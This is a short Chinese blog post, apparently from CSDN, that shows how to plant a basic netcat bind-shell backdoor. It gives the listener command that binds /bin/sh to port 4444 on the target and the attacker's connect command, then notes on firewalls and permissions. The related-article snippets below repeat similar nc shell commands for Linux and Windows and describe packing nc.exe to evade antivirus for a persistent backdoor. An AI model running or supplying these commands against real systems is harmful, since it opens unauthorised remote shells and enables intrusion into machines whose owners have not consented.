使用nc实现基本的BindShell后门

code_father1

于 2025-02-15 23:34:40 发布

阅读量224

点赞数 3

文章标签： php 服务器开发语言

本文链接：https://blog.youkuaiyun.com/code_father1/article/details/145658900

版权

使用nc实现基本的BindShell后门

基本的Bind Shell后门

目标机器上开启监听

nc -lvp 4444 -e /bin/sh

-l: 监听模式
-v: 显示详细输出
-p: 指定端口号
-e: 执行指定的程序

攻击者机器进行连接

nc ip port

注意事项：

防火墙和网络限制：确保目标机器允许TCP端口的入站连接，否则攻击无法进行连接
网络环境：确保有可连接目标机器的机器
权限问题： Netcat命令需要足够的权限来监听和shell提供。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

code_father1

关注关注

3
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

JSP WebSehll 后门脚本

悦分享

08-01

1507

目前很多大型厂商都选择使用Java进行Web项目的开发，近年来随着各种JAVA指定环境RCE漏洞的出现，JavaWeb的安全逐渐被人们所重视，与漏洞相关的还有用于后期维持权限的Webshell。与PHP不同的是，JSP的语言特性较为严格，属于强类型语言，并且在JDK9以前并没有所谓的eval函数。一般而言JSP的变形免杀较为困难，但是依旧存在很多的”黑魔法”。不知攻，焉知防。阿里云安骑士Webshell检测系统在迭代升级过程中，除了内部的不断绕过尝试以外，也长期邀请大量白帽子进行持续的绕过测试。...

红队内网攻防渗透：内网渗透之内网各种工具平台的使用

最新发布

HACKONE的博客

04-10

1200

红队内网攻防渗透内网各种工具平台的使用内网各种工具平台的使用

参与评论您还未登录，请先登录后发表或查看评论

nc--反弹shell

wzhua的博客

08-04

3209

nc--反弹shell，小实验

nc——制作后门连接与反弹shell连接的使用

1stPeak's Blog

04-18

4224

一、nc参数 -g<网关> 设置路由器跃程通信网关，最多可设置8个 -G<指向器数目> 设置来源路由指向器，其数值为4的倍数 -h 在线帮助 -i<延迟秒数> 设置时间间隔，以便传送信息及扫描通信端口 -l 使用监听模式，管控传入的资料 -n 直接使用IP地址，而不通过域名服务器。 -o<输出文件> 指定文件名称，把往来传输的数据以16进制字码倾倒...

反弹shell的方法和场景

weixin_45653478的博客

04-01

1990

nc64.exe -lvvp 1111 -e C:\Windows\System32\cmd.exe windows机器nc64.exe -lvvp 1111 -e /bin/bash linux机器。

Linux命令-nc（端口监控、文件传输、反弹shell等）

关注网络安全、云原生安全

09-17

1万+

简介 nc是netcat的简写，有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用，被设计为一个简单、可靠的网络工具。进行TCP、UDP的连接和监听，可以将标准错误分离。参数 This is nc from the netcat-openbsd package. An alternative nc is available in the netcat-traditional package. usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i inte

NC反弹shell的几种方法

qq_59350385的博客

05-12

1万+

假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统，ip为：192.168.0.4，开放7777端口且没被占用最终是将ubuntu、CentOS的shell反弹到kali上正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令，然后kali上再进行nc监听，即可反弹shell。需要目标机安装nc。反向反弹shell 方法1：bash

利用脚本自动创建后门实例的方法与实践

后门是指一种可以绕过正常权限验证，在系统中实现隐藏操作或恶意控制的程序，常用于非法入侵或监控目的。 ## 1.2 后门的概念和种类后门可以分为硬件后门和软件后门，软件后门又可细分为远程后门和本地后门。远程...

正向连接与反向连接1

08-08

通过上述步骤，我们可以清晰地了解如何使用Powercat结合nc来实现这两种连接方式。对于网络安全领域的专业人士而言，熟练掌握这些技能是非常必要的。 **参考资料：** - [FreeBuf文章]...

渗透测试 ( 4 ) --- Meterpreter 命令详解

墨鱼菜鸡

07-11

4221

From：https://blog.youkuaiyun.com/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter Meterpreter 是 Metasploit 框架中的一...

黑客实战之攻击篇——用NC打造成自己的简单后门

cexosoft的专栏

01-30

9428

大家都知道nc是一个强大并且灵活的黑客工具，用他可以做很多事情，譬如做为telnet的客户端口，譬如入侵的时候反弹回来shell，譬如扫描……但是你有没有想过将他打造成一个服务级的后门呢？现在好多跟我一样的菜鸟还不懂得编程，别人写的流行点的后门又经常被杀，那就跟我一起来自己手工制作一个后门吧，不需要任何编程知识菜鸟级的东东哦。　　首先请准备好不被杀的nc.exe（随便加个壳就可以了的），还有sc

利用NC打造成自己的简单后门

司刚军的个人专栏

12-19

4232

大家都知道nc是一个强大并且灵活的黑客工具，用他可以做很多事情，譬如做为telnet的客户端口，譬如入侵的时候反弹回来shell，譬如扫描……但是你有没有想过将他打造成一个服务级的后门呢？现在好多跟我一样的菜鸟还不懂得编程，别人写的流行点的后门又经常被杀，那就跟我一起来自己手工制作一个后门吧，不需要任何编程知识菜鸟级的东东哦。首先请准备好不被杀的nc.exe（随便加个壳就可以了的），还有sc.

Linux后门之道——NC用法别有洞天

苏安的博客

03-06

2513

对于瑞士军刀nc我们再熟悉不过了，经常被用来进行数据包发送，文件传送以及反弹shell。在渗透测试过程中如果想反弹shell我们通常的做法是：nc -l -vv -p 2222 -e /bin/bash在Linux的大部分发行版中都默认编译了nc，但也许是出于安全考虑，发行版中默认编译的nc往往没有-e选项(没有define一个GAPING_...

nc 监听数据_nc命令使用解析大全

weixin_33701632的博客

12-24

5256

名称nc - 任意的TCP和UDp连接与监听工具概要nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port][-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_protocol] [-xproxy_address[:port]] [hostname] [port[s]]描述nc(或者netc...

用nc反弹shell真有意思哈哈